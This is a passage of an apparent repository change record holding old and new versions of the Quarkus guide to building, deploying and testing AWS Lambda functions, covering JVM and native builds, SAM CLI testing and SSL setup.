{\n}\n\n@Named(\"unused\")\npublic class UnusedLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"stream\")\npublic class StreamLambda implements RequestStreamHandler {\n}\n----\n\nThe CDI name of the handler class must match the value specified within the `quarkus.lambda.handler` property.\n\n\n== Deploy to AWS Lambda Java Runtime\n\nThere are a few steps to get your lambda running on AWS. The generated maven project contains a helpful script to\ncreate, update, delete, and invoke your lambdas for pure Java and native deployments.\n\n== Build and Deploy\n\nBuild the project using maven.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean package\n----\n\nor, if using Gradle:\n----\n.\/gradlew clean assemble\n----\n\nThis will compile and package your code.\n\n== Create an Execution Role\n\nView the https:\/\/docs.aws.amazon.com\/lambda\/latest\/dg\/gettingstarted-awscli.html[Getting Started Guide] for deploying\na lambda with AWS CLI. Specifically, make sure you have created an `Execution Role`. 
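If you have not created one yet, the role can be created with the AWS CLI along these lines (an illustrative sketch; the role name and the trust policy file are placeholders, and the linked guide has the authoritative steps):\n\n[source,bash]\n----\naws iam create-role --role-name lambda-role \\\n    --assume-role-policy-document file:\/\/lambda-trust-policy.json\n----\n\n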
You will need to define\na `LAMBDA_ROLE_ARN` environment variable in your profile or console window. Alternatively, you can edit\nthe `manage.sh` script that is generated by the build and put the role value directly there:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\"\n----\n\n== Extra Build Generated Files\n\nAfter you run the build, there are a few extra files generated by the `quarkus-amazon-lambda` extension. These files\nare in the build directory: `target\/` for Maven, `build\/` for Gradle.\n\n* `function.zip` - lambda deployment file\n* `manage.sh` - wrapper around AWS Lambda CLI calls\n* `bootstrap-example.sh` - example bootstrap script for native deployments\n* `sam.jvm.yaml` - (optional) for use with the SAM CLI and local testing\n* `sam.native.yaml` - (optional) for use with the SAM CLI and native local testing\n\n== Create the function\n\nThe `target\/manage.sh` script is for managing your lambda using the AWS Lambda Java runtime. This script is provided only for\nyour convenience. Examine the output of the `manage.sh` script if you want to learn what AWS commands are executed\nto create, delete, and update your lambdas.\n\n`manage.sh` supports four operations: `create`, `delete`, `update`, and `invoke`.\n\nNOTE: To verify your setup (that you have the AWS CLI installed, have executed `aws configure` for the AWS access keys,\nand have set up the `LAMBDA_ROLE_ARN` environment variable, as described above), please execute `manage.sh` without any parameters.\nA usage statement will be printed to guide you accordingly.\n\nNOTE: If using Gradle, the path to the binaries in the `manage.sh` must be changed from `target` to `build`.\n\nTo see the `usage` statement, and validate AWS configuration:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh\n----\n\nYou can `create` your function using the following command:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh create\n----\n\nor if you do not have `LAMBDA_ROLE_ARN` already defined in this shell:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\" sh target\/manage.sh create\n----\n\nWARNING: Do not change the handler switch. This must be hardcoded to `io.quarkus.amazon.lambda.runtime.QuarkusStreamHandler::handleRequest`. This\nhandler bootstraps Quarkus and wraps your actual handler so that injection can be performed.\n\nIf there are any problems creating the function, you must delete it with the `delete` command before re-running\nthe `create` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete\n----\n\nCommands may also be stacked:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete create\n----\n\n== Invoke the Lambda\n\nUse the `invoke` command to invoke your function.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh invoke\n----\n\nThe example lambda takes input passed in via the `--payload` switch which points to a JSON file\nin the root directory of the project.\n\nThe lambda can also be invoked locally with the SAM CLI like this:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nIf you are working with your native image build, simply replace the template name with the native version:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Update the Lambda\n\nYou can update the Java code as you see fit. 
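For instance, the generated `TestLambda` can be modified freely; a minimal sketch of what such a handler can look like (the exact generated body may differ) is:\n\n[source,java]\n----\n@Named(\"test\")\npublic class TestLambda implements RequestHandler<InputObject, OutputObject> {\n\n    @Override\n    public OutputObject handleRequest(InputObject input, Context context) {\n        \/\/ Combine the greeting and name, e.g. \"Hello Stu\", and echo the AWS request id\n        OutputObject out = new OutputObject();\n        out.setResult(input.getGreeting() + \" \" + input.getName());\n        out.setRequestId(context.getAwsRequestId());\n        return out;\n    }\n}\n----\n\n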
Once you've rebuilt, you can redeploy your lambda by executing the\n`update` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh update\n----\n\n== Deploy to AWS Lambda Custom (native) Runtime\n\nIf you want a lower memory footprint and faster initialization times for your lambda, you can compile your Java\ncode to a native executable. Just make sure to rebuild your project with the `-Pnative` switch.\n\nFor Linux hosts execute:\n\n[source,bash,subs=attributes+]\n----\nmvn package -Pnative\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native\n----\n\nNOTE: If you are building on a non-Linux system, you will also need to pass in a property instructing Quarkus to use a Docker build, as Amazon\nLambda requires Linux binaries. You can do this by passing this property to your Maven build:\n`-Dnative-image.docker-build=true`, or for Gradle: `--docker-build=true`. This requires you to have Docker installed locally, however.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean install -Pnative -Dnative-image.docker-build=true\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native -Dquarkus.native.container-build=true\n----\n\nEither of these commands will compile and create a native executable image. It also generates a zip file `target\/function.zip`.\nThis zip file contains your native executable image renamed to `bootstrap`. This is a requirement of the AWS Lambda\nCustom (Provided) Runtime.\n\nThe instructions here are exactly as above with one change: you'll need to add `native` as the first parameter to the\n`manage.sh` script:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh native create\n----\n\nAs above, commands can be stacked. The only requirement is that `native` be the first parameter should you wish\nto work with native image builds. The script will take care of the rest of the details necessary to manage your native\nimage function deployments.\n\nExamine the output of the `manage.sh` script if you want to learn what AWS commands are executed\nto create, delete, and update your lambdas.\n\nOne thing to note about the create command for native is that the `aws lambda create-function`\ncall must set a specific environment variable:\n\n[source,bash,subs=attributes+]\n----\n--environment 'Variables={DISABLE_SIGNAL_HANDLERS=true}'\n----\n\n== Examine the POM and Gradle build\n\nThere is nothing special about the POM other than the inclusion of the `quarkus-amazon-lambda` and `quarkus-test-amazon-lambda` extensions\nas dependencies. The extension automatically generates everything you might need for your lambda deployment.\n\nNOTE: In previous versions of this extension you had to set up your pom or gradle\nto zip up your executable for native deployments, but this is not the case anymore.\n\n[[gradle]]\n== Gradle build\n\nSimilarly for Gradle projects, you also just have to add the `quarkus-amazon-lambda` and\n`quarkus-test-amazon-lambda` dependencies. 
The extension automatically generates everything you might need\nfor your lambda deployment.\n\nExample Gradle dependencies:\n\n[source,groovy]\n----\ndependencies {\n    implementation enforcedPlatform(\"${quarkusPlatformGroupId}:${quarkusPlatformArtifactId}:${quarkusPlatformVersion}\")\n    implementation 'io.quarkus:quarkus-resteasy'\n    implementation 'io.quarkus:quarkus-amazon-lambda'\n\n    testImplementation \"io.quarkus:quarkus-test-amazon-lambda\"\n\n    testImplementation 'io.quarkus:quarkus-junit5'\n    testImplementation 'io.rest-assured:rest-assured'\n}\n----\n\n\n== Integration Testing\nThe Quarkus Amazon Lambda extension has a matching test framework that provides functionality to execute standard JUnit tests on your AWS Lambda function,\nvia the integration layer that Quarkus provides. This is true for both JVM and native modes.\nIt provides similar functionality to the SAM CLI, without the overhead of Docker.\n\nTo illustrate, the project generated by the Maven archetype includes a JUnit test for the `RequestHandler<?, ?>` implementation, which is shown below.\nThe test replicates the execution environment for the function that is selected for invocation, as described <<choose, above>>.\n\nTo use the integration tests in your project, a property is required in `src\/test\/resources\/application.properties`. If not included, the integration tests will run in a constant loop.\n\n[source,properties]\n----\nquarkus.lambda.enable-polling-jvm-mode=true\n----\n\nNOTE: If you are following along with the example Maven archetype project for AWS Lambda in this guide,\nit includes the required property `quarkus.lambda.enable-polling-jvm-mode=true` in the test `application.properties`.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaHandlerTest {\n\n    @Test\n    public void testSimpleLambdaSuccess() throws Exception {\n        InputObject in = new InputObject();\n        in.setGreeting(\"Hello\");\n        in.setName(\"Stu\");\n\n        OutputObject out = LambdaClient.invoke(OutputObject.class, in);\n\n        Assertions.assertEquals(\"Hello Stu\", out.getResult());\n        Assertions.assertTrue(out.getRequestId().matches(\"aws-request-\\\\d\"), \"Expected requestId as 'aws-request-<number>'\");\n    }\n}\n----\n\nSimilarly, if you are using a `RequestStreamHandler` implementation, you can add a matching JUnit test, like below,\nwhich aligns with the `StreamLambda` class in the generated project.\n\nObviously, these two types of tests are mutually exclusive. You must have a test that corresponds to the implemented AWS Lambda interface,\nwhether `RequestHandler<?, ?>` or `RequestStreamHandler`.\n\nTwo versions of the test for `RequestStreamHandler` are presented below. You can use either, depending on\nthe needs of your unit test. The first is obviously simpler and quicker. 
Using Java streams can require more coding.\n\n[source,java]\n----\n@QuarkusTest\npublic class LambdaStreamHandlerTest {\n\n    private static Logger LOG = Logger.getLogger(LambdaStreamHandlerTest.class);\n\n    @Test\n    public void testSimpleLambdaSuccess() throws Exception {\n        String out = LambdaClient.invoke(String.class, \"lowercase\");\n        Assertions.assertEquals(\"LOWERCASE\", out);\n    }\n\n    @Test\n    public void testInputStreamSuccess() {\n        try {\n            String input = \"{ \\\"name\\\": \\\"Bill\\\", \\\"greeting\\\": \\\"hello\\\"}\";\n            InputStream inputStream = new ByteArrayInputStream(input.getBytes());\n            ByteArrayOutputStream outputStream = new ByteArrayOutputStream();\n\n            LambdaClient.invoke(inputStream, outputStream);\n\n            ByteArrayInputStream out = new ByteArrayInputStream(outputStream.toByteArray());\n            StringBuilder response = new StringBuilder();\n            int i = 0;\n            while ((i = out.read()) != -1) {\n                response.append((char)i);\n            }\n\n            Assertions.assertTrue(response.toString().contains(\"BILL\"));\n        } catch (Exception e) {\n            Assertions.fail(e.getMessage());\n        }\n    }\n\n}\n----\n\nIf your code uses CDI injection, this too will be executed, along with mocking functionality; see the link:getting-started-testing[Test Guide] for more details.\n\nTo add JUnit functionality for native tests, add the `@NativeImageTest` annotation to a subclass of your test class, which will execute against your native image, and can be leveraged in an IDE.\n\n\n== Testing with the SAM CLI\n\nThe https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI]\nallows you to run your lambdas locally on your laptop in a simulated Lambda environment. This requires\nhttps:\/\/www.docker.com\/products\/docker-desktop[docker] to be installed. This is an optional approach should you choose\nto take advantage of it. Otherwise, the Quarkus JUnit integration should be sufficient for most of your needs.\n\nA starter template has been generated for both JVM and native execution modes.\n\nRun the following SAM CLI command to locally test your lambda function, passing the appropriate SAM `template`.\nThe `event` parameter takes any JSON file, in this case the sample `payload.json`.\n\nNOTE: If using Gradle, the path to the binaries in the YAML templates must be changed from `target` to `build`.\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nThe native image can also be locally tested using the `sam.native.yaml` template:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Modifying `function.zip`\n\nThere are times when you may need to add files to the `function.zip` lambda deployment that is generated\nby the build. To do this, create a `zip.jvm` or `zip.native` directory within `src\/main`.\nCreate `zip.jvm\/` if you are doing a pure Java lambda, or `zip.native\/` if you are doing a native deployment.\n\nAny files and directories you create under your zip directory will be included within `function.zip`.\n\n== Custom `bootstrap` script\n\nThere are times you may want to set specific system properties or other arguments when lambda invokes\nyour native Quarkus lambda deployment. 
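For example, a custom `bootstrap` could pass a system property through to the application (an illustrative sketch; the property name is made up, and the executable is invoked as `runner` for reasons explained next):\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n\n.\/runner -Dmy.custom.property=some-value\n----\n\n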
If you include a `bootstrap` script file within\n`zip.native`, the Quarkus extension will automatically rename the executable to `runner` within\n`function.zip` and set the unix mode of the `bootstrap` script to executable.\n\nNOTE: The native executable must be referenced as `runner` if you include a custom `bootstrap` script.\n\nThe extension generates an example script within `target\/bootstrap-example.sh`.\n\n== Tracing with AWS XRay and GraalVM\n\nIf you are building native images, and want to use https:\/\/aws.amazon.com\/xray[AWS X-Ray Tracing] with your lambda,\nyou will need to include `quarkus-amazon-lambda-xray` as a dependency in your pom. The AWS X-Ray\nlibrary is not fully compatible with GraalVM, so some integration work was needed to make it work.\n\nIn addition, remember to enable the AWS X-Ray tracing parameter in `manage.sh`, in the `cmd_create()` function. This can also be set in the AWS Management Console.\n[source,bash]\n----\n --tracing-config Mode=Active\n----\n\nFor the SAM template files, add the following to the YAML function Properties.\n[source]\n----\n      Tracing: Active\n----\n\nAWS X-Ray does add many classes to your distribution, so do ensure you are using at least the 256MB AWS Lambda memory size.\nThis is explicitly set in `manage.sh` `cmd_create()`. Whilst the native image potentially can always use a lower memory setting, it would be recommended to keep the setting the same, especially to help compare performance.\n\n[[https]]\n== Using HTTPS or SSL\/TLS\n\nIf your code makes HTTPS calls, such as to a micro-service (or AWS service), you will need to add configuration to the native image,\nas GraalVM will only include the dependencies when explicitly declared. Quarkus, by default, enables this functionality on extensions that implicitly require it.\nFor further information, please consult the link:native-and-ssl[Quarkus SSL guide].\n\nOpen `src\/main\/resources\/application.properties` and add the following line to enable SSL in your native image.\n\n[source,properties]\n----\nquarkus.ssl.native=true\n----\n\n[[aws-sdk-v2]]\n== Using the AWS Java SDK v2\n\nNOTE: Quarkus now has extensions for DynamoDB, S3, SNS and SQS (more coming). 
Please check those guides on how to use the various AWS Services with Quarkus, as opposed to wiring manually like below.\n\nWith minimal integration, it is possible to leverage the AWS Java SDK v2,\nwhich can be used to invoke services such as SQS, SNS, S3 and DynamoDB.\n\nFor native images, however, the URL Connection client must be preferred over the Apache HTTP Client\nwhen using synchronous mode, due to issues in the GraalVM compilation (at present).\n\nAdd `quarkus-jaxb` as a dependency in your Maven `pom.xml`, or Gradle `build.gradle` file.\n\nYou must also force your AWS service client for SQS, SNS, S3 et al. to use the URL Connection client,\nwhich connects to AWS services over HTTPS, hence the inclusion of the SSL enabled property, as described in the <<https>> section above.\n\n[source,java]\n----\n\/\/ select the appropriate client, in this case SQS, and\n\/\/ insert your region, instead of XXXX, which also improves startup time over the default client\n client = SqsClient.builder().region(Region.XXXX).httpClient(software.amazon.awssdk.http.urlconnection.UrlConnectionHttpClient.builder().build()).build();\n----\n\nFor Maven, add the following to your `pom.xml`.\n\n[source,xml]\n----\n\n    <properties>\n        <aws.sdk2.version>2.10.69<\/aws.sdk2.version>\n    <\/properties>\n\n    <dependencyManagement>\n        <dependencies>\n\n            <dependency>\n                <groupId>software.amazon.awssdk<\/groupId>\n                <artifactId>bom<\/artifactId>\n                <version>${aws.sdk2.version}<\/version>\n                <type>pom<\/type>\n                <scope>import<\/scope>\n            <\/dependency>\n\n        <\/dependencies>\n    <\/dependencyManagement>\n    <dependencies>\n\n        <dependency>\n            <groupId>software.amazon.awssdk<\/groupId>\n            <artifactId>url-connection-client<\/artifactId>\n        <\/dependency>\n\n        <dependency>\n            <groupId>software.amazon.awssdk<\/groupId>\n            <artifactId>apache-client<\/artifactId>\n            <exclusions>\n                <exclusion>\n                    <groupId>commons-logging<\/groupId>\n                    <artifactId>commons-logging<\/artifactId>\n                <\/exclusion>\n            <\/exclusions>\n        <\/dependency>\n\n        <dependency>\n            <groupId>software.amazon.awssdk<\/groupId>\n            <!-- sqs\/sns\/s3 etc -->\n            <artifactId>sqs<\/artifactId>\n            <exclusions>\n                <!-- exclude the apache-client and netty client -->\n                <exclusion>\n                    <groupId>software.amazon.awssdk<\/groupId>\n                    <artifactId>apache-client<\/artifactId>\n                <\/exclusion>\n                <exclusion>\n                    <groupId>software.amazon.awssdk<\/groupId>\n                    <artifactId>netty-nio-client<\/artifactId>\n                <\/exclusion>\n                <exclusion>\n                    <groupId>commons-logging<\/groupId>\n                    <artifactId>commons-logging<\/artifactId>\n                <\/exclusion>\n            <\/exclusions>\n        <\/dependency>\n\n        <dependency>\n            <groupId>org.jboss.logging<\/groupId>\n            <artifactId>commons-logging-jboss-logging<\/artifactId>\n            <version>1.0.0.Final<\/version>\n        <\/dependency>\n    <\/dependencies>\n----\n\nNOTE: If you see `java.security.InvalidAlgorithmParameterException: the trustAnchors parameter must be non-empty` or a similar SSL error, due to the current status of GraalVM,\nthere is some additional work to bundle the `function.zip`, as below. For more information, please see the link:native-and-ssl[Quarkus Native SSL Guide].\n\n== Additional requirements for client SSL\n\nThe native executable requires some additional steps to enable the client SSL that S3 and other AWS libraries need.\n\n1. A custom `bootstrap` script\n2. `libsunec.so` must be added to `function.zip`\n3. `cacerts` must be added to `function.zip`\n\nTo do this, first create a directory `src\/main\/zip.native\/` in your project. 
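For example, from the project root (a trivial illustration):\n\n[source,bash]\n----\nmkdir -p src\/main\/zip.native\n----\n\n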
Next create a shell script file called `bootstrap`\nwithin `src\/main\/zip.native\/`, like below. An example is created automatically in your build folder (target or build), called `bootstrap-example.sh`.\n\n[source,bash]\n----\n#!\/usr\/bin\/env bash\n\n.\/runner -Djava.library.path=.\/ -Djavax.net.ssl.trustStore=.\/cacerts\n----\n\nAdditionally, set `-Djavax.net.ssl.trustStorePassword=changeit` if your `cacerts` file is password protected.\n\nNext you must copy some files from your GraalVM distribution into `src\/main\/zip.native\/`.\n\nNOTE: The paths to these files can differ between GraalVM versions, and depending on whether you are using the Java 8 or 11 version. Adjust accordingly.\n\n[source,bash]\n----\ncp $GRAALVM_HOME\/lib\/libsunec.so $PROJECT_DIR\/src\/main\/zip.native\/\ncp $GRAALVM_HOME\/lib\/security\/cacerts $PROJECT_DIR\/src\/main\/zip.native\/\n----\n\nNow when you run the native build, all these files will be included within `function.zip`.\n\nNOTE: If you are using a Docker image to build, then you must extract these files from this image.\n\nTo extract the required SSL files, you must start up a Docker container in the background, and attach to that container to copy the artifacts.\n\nTo begin, let's start the GraalVM container, noting the container id output.\n[source,bash,subs=attributes+]\n----\ndocker run -it -d --entrypoint bash quay.io\/quarkus\/ubi-quarkus-native-image:{graalvm-flavor}\n\n# This will output a container id, like 6304eea6179522aff69acb38eca90bedfd4b970a5475aa37ccda3585bc2abdde\n# Note this value as we will need it for the commands below\n----\n\nFirst, libsunec.so, the C library used for the SSL implementation:\n\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/lib\/libsunec.so src\/main\/zip.native\/\n----\n\nSecond, cacerts, the certificate store. 
You may need to periodically obtain an updated copy, also.\n[source,bash]\n----\ndocker cp {container-id-from-above}:\/opt\/graalvm\/lib\/security\/cacerts src\/main\/zip.native\/\n----\n\nYour final archive will look like this:\n[source,bash]\n----\njar tvf target\/function.zip\n\n bootstrap\n runner\n cacerts\n libsunec.so\n----\n\n== Amazon Alexa Integration\n\nTo use Alexa with Quarkus native, please add the following extension.\n\n[source,xml]\n----\n <dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-amazon-alexa<\/artifactId>\n <\/dependency>\n----\n\nCreate your Alexa handler, as normal, by sub-classing the abstract `com.amazon.ask.SkillStreamHandler`, and add your request handler implementation.\n\nThat's all there is to it!\n","old_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/master\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Quarkus - Amazon Lambda\n:extension-status: preview\n\ninclude::.\/attributes.adoc[]\n\nThe `quarkus-amazon-lambda` extension allows you to use Quarkus to build your AWS Lambdas.\nYour lambdas can use injection annotations from CDI or Spring and other Quarkus facilities as you need them.\n\nQuarkus lambdas can be deployed using the Amazon Java Runtime, or you can build a native executable and use\nAmazon's Custom Runtime if you want a smaller memory footprint and faster cold boot startup time.\n\ninclude::.\/status-include.adoc[]\n\n== Prerequisites\n\nTo complete this guide, you need:\n\n* less than 30 minutes\n* JDK 11 (AWS requires JDK 1.8 or 11)\n* Apache Maven {maven-version}\n* https:\/\/aws.amazon.com[An Amazon AWS account]\n* https:\/\/docs.aws.amazon.com\/cli\/latest\/userguide\/cli-chap-install.html[AWS CLI]\n* https:\/\/docs.aws.amazon.com\/serverless-application-model\/latest\/developerguide\/serverless-sam-cli-install.html[AWS SAM CLI], for local testing\n\nNOTE: For Gradle projects please <<gradle,see below>>, or for further reference consult the guide in the link:gradle-tooling[Gradle setup page].\n\n== Getting Started\n\nThis guide walks you through generating an example Java project via a maven archetype and deploying it to AWS.\n\n== Installing AWS bits\n\nInstalling all the AWS bits is probably the most difficult thing about this guide. 
Make sure that you follow all the steps\nfor installing AWS CLI.\n\n== Creating the Maven Deployment Project\n\nCreate the Quarkus AWS Lambda maven project using our Maven Archetype.\n\n\n[source,bash,subs=attributes+]\n----\nmvn archetype:generate \\\n -DarchetypeGroupId=io.quarkus \\\n -DarchetypeArtifactId=quarkus-amazon-lambda-archetype \\\n -DarchetypeVersion={quarkus-version}\n----\n\n[NOTE]\n====\nIf you prefer to use Gradle, you can quickly and easily generate a Gradle project via https:\/\/code.quarkus.io\/[code.quarkus.io]\nadding the `quarkus-amazon-lambda` extension as a dependency.\n\nCopy the build.gradle, gradle.properties and settings.gradle into the above generated Maven archetype project, to follow along with this guide.\n\nExecute: gradle wrapper to setup the gradle wrapper (recommended).\n\nThe dependency for `quarkus-test-amazon-lambda` will also need to be added to your build.gradle.\n\nFor full Gradle details <<gradle, see below>>.\n====\n\n[[choose]]\n== Choose Your Lambda\n\nThe `quarkus-amazon-lambda` extension scans your project for a class that directly implements the Amazon `RequestHandler<?, ?>` or `RequestStreamHandler` interface.\nIt must find a class in your project that implements this interface or it will throw a build time failure.\nIf it finds more than one handler class, a build time exception will also be thrown.\n\nSometimes, though, you might have a few related lambdas that share code and creating multiple maven modules is just\nan overhead you don't want to do. The `quarkus-amazon-lambda` extension allows you to bundle multiple lambdas in one\nproject and use configuration or an environment variable to pick the handler you want to deploy.\n\nThe generated project has three lambdas within it. Two that implement the `RequestHandler<?, ?>` interface, and one that implements the `RequestStreamHandler` interface. One that is used and two that are unused. If you open up\n`src\/main\/resources\/application.properties` you'll see this:\n\n[source,properties,subs=attributes+]\n----\nquarkus.lambda.handler=test\n----\n\nThe `quarkus.lambda.handler` property tells Quarkus which lambda handler to deploy. This can be overridden\nwith an environment variable too.\n\nIf you look at the three generated handler classes in the project, you'll see that they are `@Named` differently.\n\n[source,java,subs=attributes+]\n----\n@Named(\"test\")\npublic class TestLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"unused\")\npublic class UnusedLambda implements RequestHandler<InputObject, OutputObject> {\n}\n\n@Named(\"stream\")\npublic class StreamLambda implements RequestStreamHandler {\n}\n----\n\nThe CDI name of the handler class must match the value specified within the `quarkus.lambda.handler` property.\n\n\n== Deploy to AWS Lambda Java Runtime\n\nThere are a few steps to get your lambda running on AWS. The generated maven project contains a helpful script to\ncreate, update, delete, and invoke your lambdas for pure Java and native deployments.\n\n== Build and Deploy\n\nBuild the project using maven.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean package\n----\n\nor, if using Gradle:\n----\n.\/gradlew clean assemble\n----\n\nThis will compile and package your code.\n\n== Create an Execution Role\n\nView the https:\/\/docs.aws.amazon.com\/lambda\/latest\/dg\/gettingstarted-awscli.html[Getting Started Guide] for deploying\na lambda with AWS CLI. Specifically, make sure you have created an `Execution Role`. 
You will need to define\na `LAMBDA_ROLE_ARN` environment variable in your profile or console window, Alternatively, you can edit\nthe `manage.sh` script that is generated by the build and put the role value directly there:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\"\n----\n\n== Extra Build Generated Files\n\nAfter you run the build, there are a few extra files generated by the `quarkus-amazon-lambda` extension. These files\nare in the the build directory: `target\/` for maven, `build\/` for gradle.\n\n* `function.zip` - lambda deployment file\n* `manage.sh` - wrapper around aws lambda cli calls\n* `bootstrap-example.sh` - example bootstrap script for native deployments\n* `sam.jvm.yaml` - (optional) for use with sam cli and local testing\n* `sam.native.yaml` - (optional) for use with sam cli and native local testing\n\n== Create the function\n\nThe `target\/manage.sh` script is for managing your lambda using the AWS Lambda Java runtime. This script is provided only for\nyour convenience. Examine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\n`manage.sh` supports four operation: `create`, `delete`, `update`, and `invoke`.\n\nNOTE: To verify your setup, that you have the AWS CLI installed, executed aws configure for the AWS access keys,\nand setup the `LAMBDA_ROLE_ARN` environment variable (as described above), please execute `manage.sh` without any parameters.\nA usage statement will be printed to guide you accordingly.\n\nNOTE: If using Gradle, the path to the binaries in the `manage.sh` must be changed from `target` to `build`\n\nTo see the `usage` statement, and validate AWS configuration:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh\n----\n\nYou can `create` your function using the following command:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh create\n----\n\nor if you do not have `LAMBDA_ROLE_ARN` already defined in this shell:\n\n[source,bash]\n----\nLAMBDA_ROLE_ARN=\"arn:aws:iam::1234567890:role\/lambda-role\" sh target\/manage.sh create\n----\n\nWARNING: Do not change the handler switch. This must be hardcoded to `io.quarkus.amazon.lambda.runtime.QuarkusStreamHandler::handleRequest`. This\nhandler bootstraps Quarkus and wraps your actual handler so that injection can be performed.\n\nIf there are any problems creating the function, you must delete it with the `delete` function before re-running\nthe `create` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete\n----\n\nCommands may also be stacked:\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh delete create\n----\n\n== Invoke the Lambda\n\nUse the `invoke` command to invoke your function.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh invoke\n----\n\nThe example lambda takes input passed in via the `--payload` switch which points to a json file\nin the root directory of the project.\n\nThe lambda can also be invoked locally with the SAM CLI like this:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.jvm.yaml --event payload.json\n----\n\nIf you are working with your native image build, simply replace the template name with the native version:\n\n[source,bash]\n----\nsam local invoke --template target\/sam.native.yaml --event payload.json\n----\n\n== Update the Lambda\n\nYou can update the Java code as you see fit. 
Once you've rebuilt, you can redeploy your lambda by executing the\n`update` command.\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh update\n----\n\n== Deploy to AWS Lambda Custom (native) Runtime\n\nIf you want a lower memory footprint and faster initialization times for your lambda, you can compile your Java\ncode to a native executable. Just make sure to rebuild your project with the `-Pnative` switch.\n\nFor Linux hosts execute:\n\n[source,bash,subs=attributes+]\n----\nmvn package -Pnative\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native\n----\n\nNOTE: If you are building on a non-Linux system, you will need to also pass in a property instructing quarkus to use a docker build as Amazon\nLambda requires linux binaries. You can do this by passing this property to your Maven build:\n`-Dnative-image.docker-build=true`, or for Gradle: `--docker-build=true`. This requires you to have docker installed locally, however.\n\n[source,bash,subs=attributes+]\n----\n.\/mvnw clean install -Pnative -Dnative-image.docker-build=true\n----\n\nor, if using Gradle:\n[source,bash,subs=attributes+]\n----\n.\/gradlew build -Dquarkus.package.type=native -Dquarkus.native.container-build=true\n----\n\nEither of these commands will compile and create a native executable image. It also generates a zip file `target\/function.zip`.\nThis zip file contains your native executable image renamed to `bootstrap`. This is a requirement of the AWS Lambda\nCustom (Provided) Runtime.\n\nThe instructions here are exactly as above with one change: you'll need to add `native` as the first parameter to the\n`manage.sh` script:\n\n[source,bash,subs=attributes+]\n----\nsh target\/manage.sh native create\n----\n\nAs above, commands can be stacked. The only requirement is that `native` be the first parameter should you wish\nto work with native image builds. The script will take care of the rest of the details necessary to manage your native\nimage function deployments.\n\nExamine the output of the `manage.sh` script if you want to learn what aws commands are executed\nto create, delete, and update your lambdas.\n\nOne thing to note about the create command for native is that the `aws lambda create-function`\ncall must set a specific environment variable:\n\n[source,bash,subs=attributes+]\n----\n--environment 'Variables={DISABLE_SIGNAL_HANDLERS=true}'\n----\n\n== Examine the POM and Gradle build\n\nThere is nothing special about the POM other than the inclusion of the `quarkus-amazon-lambda` and `quarkus-test-amazon-lambda` extensions\nas a dependencies. The extension automatically generates everything you might need for your lambda deployment.\n\nNOTE: In previous versions of this extension you had to set up your pom or gradle\nto zip up your executable for native deployments, but this is not the case anymore.\n\n[[gradle]]\n== Gradle build\n\nSimilarly for Gradle projects, you also just have to add the `quarkus-amazon-lambda` and\n`quarkus-test-amazon-lambda` dependencies. 
The extension automatically generates everything you might need\nfor your lambda deployment.\n\nExample Gradle dependencies:\n\n[source,groovy]\n----\ndependencies {\n implementation enforcedPlatform(\"${quarkusPlatformGroupId}:${quarkusPlatformArtifactId}:${quarkusPlatformVersion}\")\n implementation 'io.quarkus:quarkus-resteasy'\n implementation 'io.quarkus:quarkus-amazon-lambda'\n\n testimplementation \"io.quarkus:quarkus-test-amazon-lambda\"\n\n testImplementation 'io.quarkus:quarkus-junit5'\n testImplementation 'io.rest-assured:rest-assured'\n}\n----\n\n\n== Integration Testing\nThe Quarkus Amazon Lambda extension has a matching test framework that provides functionality to execute standard JUnit tests on your AWS Lambda function,\nvia the integration layer that Quarkus provides. This is true for both JVM and native modes.\nIt provides similar functionality to the SAM CLI, without the overhead of Docker.\n\nTo illustrate, the project generated by the Maven archetype, generates a JUnit test for the `RequestHandler<?, ?>` implementation, which is shown below.\nThe test replicates the execution environment, for the function that is selected for invocation, as described <<choose, above>>.\n\nTo use the integration tests in your project there is a required property, in 